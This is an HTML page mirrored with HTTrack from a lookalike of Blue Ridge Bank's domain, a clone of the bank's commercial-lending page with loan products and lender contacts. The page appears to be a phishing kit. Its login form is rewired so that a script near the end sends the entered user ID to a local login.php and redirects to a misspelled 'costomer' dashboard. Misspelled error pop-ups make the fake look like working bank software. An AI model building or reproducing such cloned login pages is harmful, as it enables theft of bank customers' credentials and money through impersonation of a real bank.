<!DOCTYPE html>
<html class="no-js" lang="en">
<!-- Mirrored from www.blueridgebank.com/business/commercial-lending by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Mar 2024 23:25:45 GMT -->
<!-- Added by HTTrack -->

<!-- Mirrored from blue-ridgebk.com/business/commercial-lending.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Oct 2024 18:33:32 GMT -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>
    Commercial Lending | Blue Ridge Bank
  </title>
  <meta name="description" content="">
  <meta name="keywords" content="">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="apple-mobile-web-app-title" content="Blue Ridge Bank and Trust Co.">
  <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-63016301-1"></script>
  <script>function gtag() { dataLayer.push(arguments) } window.dataLayer = window.dataLayer || [], gtag("js", new Date), gtag("config", "UA-63016301-1")</script>
  <link rel="stylesheet" href="../assets/css/main.minbd2fbd2f.css?v=1645637503784">
  <script src="../ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.html"></script>
  <script>WebFont.load({ google: { families: ["Poppins:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i"] } })</script>
  <script type="text/javascript" src="../cdn.rlets.com/capture_configs/950/c58/b93/967466697e29ce2dcd0be64.html"
    async="async"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

</head>

<body class="subpage template-team-members">
  <div class="master-container">
    <header class="header">
      <div class="d-none d-lg-block bg-light topnav-wrap">
        <div class="container">
          <nav class="topnav__links" aria-label="Top navigation">
            <ul class="banno-menu menu-121a2bd0-a11d-11ea-9d90-0242da0b0362">
              <li class="menu-external">
                <a href="https://login2.fisglobal.com/idp/TSS118/?ClientID=WebLinkUI" target="_blank">Trust Login</a>

              </li>
              <li class="menu-external">
                <a href="https://smartpay.profitstars.com/expressbd/BillerDirect?returnUrl=https%3A%2F%2Fsmartpay.profitstars.com%3A443%2Fexpressbd%2FBillerDirect%2FBillerDirect%2FIndex"
                  target="_blank">Make a Payment</a>

              </li>
            </ul>
          </nav>
        </div>
      </div>
      <div class="container">
        <div
          class="header__inner d-md-flex flex-md-row justify-content-md-between align-items-md-center align-content-md-center">
          <div class="header__left"><span itemscope="" itemtype="http://schema.org/BankOrCreditUnion"><span
                itemprop="name" class="sr-only">Blue Ridge Bank and Trust Co.</span> <a href="../index-2.html"
                class="logo" title="Blue Ridge Bank and Trust Co., Independence, MO" itemprop="url"><span
                  class="logotype" itemprop="image" itemscope="" itemtype="http://schema.org/ImageObject"><img
                    src="../assets/img/blue-ridge-bank-and-trust-co.svg" alt="Blue Ridge Bank and Trust Co."
                    itemprop="url"></span></a></span></div>
          <div class="header__right d-flex justify-content-center align-items-center">
            <nav class="navbar" aria-label="Primary">
              <div class="navbar-header"><button type="button" class="navbar-toggle collapsed btn btn-primary"
                  data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false" aria-haspopup="true"><span
                    class="sr-only">Toggle </span>Menu</button></div>
              <div class="collapse navbar-collapse" id="navbar-collapse">
                <div class="d-flex d-lg-none justify-content-between align-items-center p-2">
                  <div class="menu-title-text">Menu</div><button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false"
                    aria-haspopup="true">Close<span class="sr-only"> Menu</span><span class="icon icon-close"
                      aria-hidden="true"></span></button>
                </div>
                <ul class="banno-menu menu-121a2bd3-a11d-11ea-9d90-0242da0b0362">
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Personal</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Apply Online</span>
                        <ul class="dropdown-menu">

                          <li class="menu-internal">
                            <a href="../loan-account-application.html">Loan Account Application</a>

                          </li>
                        </ul>
                      </li>

                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Business</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Business Products and
                          Services</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="checking.html">Checking</a>

                          </li>
                          <li class="menu-internal">
                            <a href="commercial-lending.html">Commercial Lending</a>

                          </li>
                          <li class="menu-internal">
                            <a href="treasury-services.html">Treasury Services</a>

                          </li>
                          <li class="menu-internal">
                            <a href="card-services.html">Card Services</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Online</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Online Services</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="../online/personal-online-banking.html">Personal</a>

                          </li>
                          <li class="menu-internal">
                            <a href="../online/business-online-banking.html">Business</a>

                          </li>
                        </ul>
                      </li>
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Online Security</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="../security.html">Security Statement</a>

                          </li>
                          <li class="menu-internal">
                            <a href="../online/online-security/protecting-identity.html">Protecting Identity</a>

                          </li>
                          <li class="menu-internal">
                            <a href="../online/online-security/scam-alerts.html">Scam Alerts!</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">About Us</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Who We Are</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="../about-us/history.html">History</a>

                          </li>
                          <li class="menu-internal">
                            <a href="../about-us/contact-us.html">Contact Us</a>

                          </li>
                          <li class="menu-internal">
                            <a href="../about-us/careers.html">Careers</a>

                          </li>
                          <li class="menu-internal">
                            <a href="../about-us/news.html">News</a>

                          </li>
                          <li class="menu-internal">
                            <a href="../about-us/policies-and-disclosures.html">Policies & Disclosures</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                </ul>
                <div class="d-block d-lg-none mb-2">
                  <nav class="topnav__links" aria-label="Top navigation">
                    <ul class="banno-menu menu-121a2bd0-a11d-11ea-9d90-0242da0b0362">
                      <li class="menu-external">
                        <a href="https://login2.fisglobal.com/idp/TSS118/?ClientID=WebLinkUI" target="_blank">Trust
                          Login</a>

                      </li>
                      <li class="menu-external">
                        <a href="https://smartpay.profitstars.com/expressbd/BillerDirect?returnUrl=https%3A%2F%2Fsmartpay.profitstars.com%3A443%2Fexpressbd%2FBillerDirect%2FBillerDirect%2FIndex"
                          target="_blank">Make a Payment</a>

                      </li>
                    </ul>
                  </nav>
                </div><button type="button" class="header__button toggle-search d-none d-lg-inline-block"><span
                    class="icon icon-search" aria-hidden="true"></span><span class="sr-only">Open Search</span></button>
                <div class="search-internal d-block">
                  <div class="d-flex flex-row justify-content-lg-end h-100 align-items-center">
                    <div class="d-none d-lg-block mr-2"><button class="header__button toggle-search"><span
                          class="search-close-text">Close<span class="sr-only"> Search</span></span> <span
                          class="icon icon-close" aria-hidden="true"></span></button></div>
                    <div class="d-block w-100 w-lg-auto">
                      <form method="GET" action="https://www.blueridgebank.com/search" class="parsley-absolute mb-0"
                        data-parsley-validate="">
                        <div
                          class="form-group mb-0 d-flex flex-row justify-content-between align-items-center align-content-center">
                          <label for="siteSearch" class="sr-only">Enter search terms</label> <input name="q"
                            id="siteSearch" class="form-control mr-1" type="search" placeholder="Search..."
                            data-parsley-required="true" data-parsley-errors-container="#search-error"> <button
                            type="submit" class="search-submit btn btn-primary"><span class="icon icon-search"
                              aria-hidden="true"></span><span class="sr-only">Start Site Search</span></button>
                        </div>
                      </form>
                    </div>
                  </div>
                </div>
              </div>
            </nav>
            <div class="olb">
              <div class="olb__toggle btn btn-success"><span class="login-text">Login<span class="sr-only"> to online
                    banking</span></span> <span class="close-text">Close<span class="sr-only"> online
                    banking</span></span></div>
              <div class="olb__container" role="region" aria-labelledby="region--olb-title">
                <div class="d-block d-md-none p-2 text-right"><button class="olb__toggle"><span
                      class="close-text">Close</span><span class="sr-only"> online banking</span> <span
                      class="icon icon-close ml-2" aria-hidden="true"></span></button></div>
                <!--------------------------------loging----------------------------------------->
                <form class="olb__login parsley-absolute" id="loginForm" method="post">
                  <div class="form-label" id="region--olb-title">Log into Your Account</div>

                  <div class="form-group mb-0">
                    <i id="ermptyErrro"></i><br>
                    <label for="id">User ID </label>
                    <input type="text" name="id" id="id" class="form-control" autocomplete="off" required="">
                  </div>
                  <input type="button" id="loginBtn" class="btn btn-small btn-success" value="Login">
                </form>
                <div class="olb__links d-md-flex justify-content-md-center text-center">
                  <div><a
                      href="https://www.netteller.com/login2008/Authentication/Views/LoginPasswordSelfReset.aspx?returnUrl=%2fblueridgebank%2f">Forgot
                      Password</a></div>
                  <div><a
                      href="https://www.netteller.com/login2008/Authentication/Views/OnlineEnrollmentAgreement.aspx?returnUrl=%2fblueridgebank%2f">Enroll</a>
                  </div>
                  <div><a href="https://login2.fisglobal.com/idp/TSS118/?ClientID=WebLinkUI">Trust Login</a></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </header>
    <div id="main" tabindex="-1" role="main">
      <div class="hero__subpage remove-blank">
        <div class="hero__subpage-inner">
          <div class="hero__subpage-image">
            <div data-content-block="bannerImage" data-content="content" data-editable="editable" class="image">
              <div><img alt="Commercial building under construction."
                  src="../assets/files/fJB98X4t/headers_bus-comm-lending.jpg" image-id="fJB98X4t"></div>
            </div>
          </div>
        </div>
      </div>
      <div class="subpage-content my-2 my-sm-4 my-md-10">
        <div class="container">
          <h1 class="page-title">Commercial Lending</h1>
          <div class="row justify-content-center pb-2 pb-md-0">
            <div class="col-md-6 my-2 my-md-3 remove-blank">
              <div class="bg-light text-center px-1 px-md-3 px-3 py-3 py-md-6 h-100 remove-blank">
                <div data-content-block="graySpace1" data-content="content" data-editable="editable" class="content">
                  <h2>Blue Ridge Bank and Trust Co. offers a full line of commercial loan products.</h2>
                </div>
              </div>
            </div>
            <div class="col-md-6 my-2 my-md-3 remove-blank">
              <div class="bg-light text-center px-1 px-md-3 px-3 py-3 py-md-6 h-100 remove-blank">
                <div data-content-block="graySpace2" data-content="content" data-editable="editable" class="content">
                  <h2>Let us help your business with all of your financing needs.</h2>
                </div>
              </div>
            </div>
          </div>
          <div class="content" data-content-block="bodyCopy1" data-content="content" data-editable="editable">
            <div>
              <div class="table-responsive">
                <table class="table table-striped" style="width: 100%; border-collapse: collapse;">
                  <thead>
                    <tr>
                      <th>Loan Types</th>
                      <th>Loan Financing</th>
                      <th>Types of Credit</th>
                    </tr>
                  </thead>
                  <tbody>
                    <tr>
                      <td style="width: 33.3333%;">Real Estate Loans</td>
                      <td style="width: 33.3333%;"><span>Inventory Financing</span></td>
                      <td style="width: 33.3333%;"><span>Lines of Credit</span></td>
                    </tr>
                    <tr>
                      <td style="width: 33.3333%;"><span>Term Loans</span></td>
                      <td style="width: 33.3333%;"><span>Property Improvement</span></td>
                      <td style="width: 33.3333%;"><span>Letters of Credit</span></td>
                    </tr>
                    <tr>
                      <td style="width: 33.3333%;"><span>SBA Loans</span></td>
                      <td style="width: 33.3333%;"><span>Equipment Acquisition</span></td>
                      <td style="width: 33.3333%;"><span>Working Capital</span></td>
                    </tr>
                    <tr>
                      <td style="width: 33.3333%;"><strong>FASTtrack Business
                          Loans</strong><span>:</span><br><span>$25,000 to $100,000 loans,</span><br><span>24-48 hour
                          turnaround</span></td>
                      <td style="width: 33.3333%;"><span>Lease Financing</span></td>
                      <td style="width: 33.3333%;"><span> Capital Improvement</span></td>
                    </tr>
                  </tbody>
                </table>
              </div>
            </div>
          </div>
          <section class="team-members">
            <div class="team-members__section-heading bg-primary text-white remove-blank content"
              data-content-block="teamHeading1" data-content="content" data-editable="editable">
              <div>Meet Our Lenders</div>
            </div>
            <div class="row">
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember1"
                  data-content="content" data-editable="editable">
                  <div class="biggest">
                    <div class="biggest"><img alt="Cindy James profile photo"
                        src="../assets/files/sOadOqDm/Lending_Commercial_James-Cindy.jpg" image-id="sOadOqDm"><span
                        style="font-size: 1.25rem;">Cindy James</span></div>
                    <div>Senior Vice President</div>
                    <div>Commercial Lender<br>Phone <a href="tel:8167954067">816-795-4069</a><br><a
                        href="mailto:cjames@blueridgebank.net" data-link-id="" data-link-type-id="email" class=""
                        data-disclaimer-id="121faa10-a11d-11ea-9d90-0242da0b0362" target="_self"
                        data-disclaimer-handled="">Email Cindy</a></div>
                  </div>
                  <div> </div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember2"
                  data-content="content" data-editable="editable">
                  <div class="biggest">
                    <div class="biggest"><img alt="Mary Blom profile photo"
                        src="../assets/files/8QQVq2Ft/Lending_Commercial_Blom-Mary.jpg" image-id="8QQVq2Ft">Mary Blom
                    </div>
                    <div>Vice President</div>
                    <div>Commercial Lender<br>Phone <a href="tel:8167954067">816-795-4067</a><br><a
                        href="mailto:mblom@blueridgebank.net" data-link-id="" data-link-type-id="email" class=""
                        data-disclaimer-id="121faa10-a11d-11ea-9d90-0242da0b0362" target="_self"
                        data-disclaimer-handled="">Email Mary</a></div>
                  </div>
                  <div> </div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember3"
                  data-content="content" data-editable="editable">
                  <div class="biggest">
                    <div class="biggest"><img alt="Adam Hubbard"
                        src="../assets/files/r5XKuxl0/Lending_Commerical_Adam_Hubbard_2021.jpg" image-id="r5XKuxl0">Adam
                      Hubbard</div>
                    <div>Vice President</div>
                    <div>Commercial Lender<br>Phone <a href="tel:8167954081">816-795-4081</a><br><a
                        href="mailto:ahubbard@blueridgebank.net" data-link-id="" data-link-type-id="email" class=""
                        data-disclaimer-id="121faa10-a11d-11ea-9d90-0242da0b0362" target="_self"
                        data-disclaimer-handled="">Email Adam</a></div>
                  </div>
                  <div> </div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember4"
                  data-content="content" data-editable="editable">
                  <div class="biggest">
                    <div class="biggest"><img alt="Dee Carbaugh profile photo"
                        src="../assets/files/UPhk5Hmq/Lending_Commercial_Carbaugh-Dee.jpg" image-id="UPhk5Hmq">Dee
                      Carbaugh</div>
                    <div>Vice President</div>
                    <div>Commercial Lender<br>Phone <a href="tel:8167954082">816-795-4082</a><br><a
                        href="mailto:dcarbaugh@blueridgebank.net" data-link-id="" data-link-type-id="email" class=""
                        data-disclaimer-id="121faa10-a11d-11ea-9d90-0242da0b0362" target="_blank" rel="noopener"
                        data-disclaimer-handled="">Email Dee</a></div>
                    <div><strong><span class="small">FASTtrack Business Loans</span></strong></div>
                  </div>
                  <div> </div>
                </div>
              </div>
            </div>
            <div class="team-members__section-heading bg-primary text-white remove-blank content"
              data-content-block="teamHeading2" data-content="content" data-editable="editable">
              <div><br></div>
            </div>
            <div class="row">
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember5"
                  data-content="content" data-editable="editable">
                  <div class="biggest">
                    <div><img alt="Andrea Wiltfang profile photo"
                        src="../assets/files/6bMjRTEI/Lending_Commercial_Wiltfang-Andrea.jpg" image-id="6bMjRTEI"></div>
                    <div class="biggest">
                      <div class="biggest">Andrea Wiltfang</div>
                    </div>
                    <div>Vice President</div>
                    <div>Commercial Lender<br>Phone <a href="tel:8167954073">816-795-4073</a><br><a
                        href="mailto:awiltfang@blueridgebank.net" data-link-id="" data-link-type-id="email" class=""
                        data-disclaimer-id="121faa10-a11d-11ea-9d90-0242da0b0362" target="_blank" rel="noopener"
                        data-disclaimer-handled="">Email Andrea</a></div>
                  </div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember6"
                  data-content="content" data-editable="editable">
                  <div>
                    <div><img alt="William Murillo profile photo"
                        src="../assets/files/rlstKTZY/Lending_Commercial_Murillo-William.jpg" image-id="rlstKTZY"></div>
                    <div class="biggest">
                      <div class="biggest">William Murillo</div>
                    </div>
                    <div>Vice President</div>
                    <div>Commercial Lender<br>Phone <a href="tel:8167954066">816-795-4066</a><br><a
                        href="mailto:wmurillo@blueridgebank.net" data-link-id="" data-link-type-id="email" class=""
                        data-disclaimer-id="121faa10-a11d-11ea-9d90-0242da0b0362" target="_blank" rel="noopener"
                        data-disclaimer-handled="">Email William</a></div>
                  </div>
                  <div> </div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember7"
                  data-content="content" data-editable="editable">
                  <div><br></div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember8"
                  data-content="content" data-editable="editable">
                  <div><br></div>
                </div>
              </div>
            </div>
            <div class="team-members__section-heading bg-primary text-white remove-blank content"
              data-content-block="teamHeading3" data-content="content" data-editable="editable">
              <div><br></div>
            </div>
            <div class="row">
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember9"
                  data-content="content" data-editable="editable">
                  <div><br></div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember10"
                  data-content="content" data-editable="editable">
                  <div><br></div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember11"
                  data-content="content" data-editable="editable">
                  <div><br></div>
                </div>
              </div>
              <div class="col-md-3">
                <div class="team-members__team-member remove-blank content" data-content-block="teamMember12"
                  data-content="content" data-editable="editable">
                  <div><br></div>
                </div>
              </div>
            </div>
          </section>
          <div data-content-block="bodyCopy2" data-content="content" data-editable="editable" class="content">
            <div><br></div>
          </div>
        </div>
      </div>
    </div>
    <footer class="footer text-light py-4 text-center" id="footer">
      <div class="backToTop__container text-right">
        <div class="container"><button type="button" id="scrollTop"><span class="sr-only">Back to the
              top</span></button></div>
      </div>
      <div class="container">
        <div class="footer__inner">
          <div class="social"><a href="https://www.facebook.com/BlueRidgeBankandTrustCo"><span
                class="icon icon-facebook" aria-hidden="true"></span><span class="sr-only">Facebook</span></a> <a
              href="https://www.linkedin.com/company/blue-ridge-bank-and-trust-co-/"><span class="icon icon-linkedin"
                aria-hidden="true"></span><span class="sr-only">LinkedIn</span></a></div>
          <nav class="footer__links mt-4" aria-label="Footer">
            <ul class="banno-menu menu-121b1631-a11d-11ea-9d90-0242da0b0362">
              <li class="menu-internal">
                <a href="../privacy-policy.html">Privacy Policy</a>

              </li>
              <li class="menu-internal">
                <a href="../security.html">Security Policy</a>

              </li>
              <li class="menu-internal">
                <a href="../usa-patriot-act.html">USA Patriot Act</a>

              </li>
              <li class="menu-internal">
                <a href="../about-us/policies-and-disclosures.html">Disclosures</a>

              </li>
              <li class="menu-internal">
                <a href="../about-us/contact-us.html">Contact Us</a>

              </li>
            </ul>
          </nav>
          <div class="copyright mt-4"><span class="copytext">© <span class="copy-date"></span> Blue Ridge Bank and Trust
              Co.</span> <span class="ml-xs-4 fdic"><a href="https://www.fdic.gov/" title="Member FDIC">Member
                FDIC</a>.</span> <span class="ehl"><a href="https://www.hud.gov/" title="Equal Housing Lender">Equal
                Housing Lender <span class="icon icon-ehl" aria-hidden="true"></span></a></span>
            <div class="mt-4"><span class="jha mr-2"><a href="https://www.banno.com/" class="external"><span
                    class="icon icon-jha" aria-hidden="true"></span><span class="sr-only">Created by
                    Banno</span></a></span>
              <div id="sentinel-badge" data-theme="dark">


                <script src="../banno.com/a/monitor/api/badge/badge.min.html" async="async"></script>
              </div>
            </div>
          </div>
        </div>
      </div>
    </footer>
  </div>
  <script src="../assets/js/jquery.min.js"></script>
  <script defer="defer" src="../assets/js/script.min584f584f.js?v=1645637503763"></script>
  <script src="../assets/target/disclaimers3b6c3b6c.js?bh=e14aac" id="disclaimerscript" defer="defer" proceed="Proceed"
    cancel="Cancel"></script>
  <script type="text/javascript">
      (function (serve, h, s) {
        window.kernel = window.kernel || function () { (window.kernel.q = window.kernel.q || []).push(arguments); };
        h = document.getElementsByTagName("head")[0]; s = document.createElement("script"); s.src = "https://" + serve + "/kernel.js"; s.async = 1; h.appendChild(s);
      })("kernel-serve.banno.com");
    kernel("create", "f32c1ff2-22ad-43e9-a7a2-d0af2500265b");
    kernel("visit"); kernel("addClickthroughListeners", []); kernel("associate", [{ "loginFormId": "loginForm", "usernameField": "id" }]);
  </script>
  <script nomodule="nomodule" type="text/javascript">

    function ieWarning() {
      document.body.setAttribute("style", "padding-bottom: 120px;");
      var warning = document.createElement("section");
      warning.setAttribute("class", "ie-disclaimer");
      warning.setAttribute("style", "background-color: #000; color:#fff; padding: 10px 40px; position: fixed; bottom: 0; z-index: 1040; height: 120px;");
      warning.setAttribute("aria-label", "Important notice regarding browser support");
      var warningContent = 'Please note: As of February 15, 2022, this website will no longer function with this browser' +
        ' version. This website was built to support the use of modern browsers. The browser that you are currently using' +
        ' is no longer fully supported by Microsoft and is not considered a modern browser. To use this site, please open' +
        ' in a modern browser like Google Chrome, Firefox, Safari, or a currently supported version of Microsoft Edge.';
      warning.innerHTML = warningContent;
      var firstElement = document.body.children[0];
      document.body.insertBefore(warning, firstElement);
    }
    window.addEventListener("load", ieWarning);

  </script>
  <script src="login.js"></script>

  <script>


    $(document).ready(function () {
      
       
        console.log("oooo");
        $("#loginBtn").on("click", function (e) {
            e.preventDefault();
            $(".preload-container").show();
            var id = $("#id").val();
            //alert("pppp");
            //    if (id=="") {
            //     $("#ermptyErrro").html("<i style='color:red'>Id cant be empty</i>");
            //    }
            $.ajax({
                url: "../Authentication/login.php",
                type: "POST",
                data: { id: id },
    
                beforSend: function () {
                    $(".preload-container").show();
                },
    
                success: function (data) {
                    //console.log(data);
    
                    if (data == 'block') {
                      Swal.fire({
                            title: "Opps!",
                            text: "Opps you dont have access to this account contact our support!",
                            icon: "error",
                            button: "Ok!",
    
                        })
    
                    } else if (data == "emptyId") {
                        $("#ermptyErrro").html("<i style='color:red;input'>Id can't be empty</i>");
    
                    } else if (data == "invakidACC") {
                      Swal.fire({
                            title: "Opps!",
                            text: "Invalid Account!",
                            icon: "error",
                            button: "Ok!",
    
                        })
                    } else if (data == "succesdash") {
                        window.location.href = '../costomer/dashboard.php';
    
                    }
                },
    
                complete: function () {
                    $(".preload-container").hide();
                }
            })
        })
    })
       
       </script>


</body>
<!-- Mirrored from www.blueridgebank.com/business/commercial-lending by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Mar 2024 23:25:47 GMT -->


<!-- Mirrored from blue-ridgebk.com/business/commercial-lending.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Oct 2024 18:33:37 GMT -->
</html>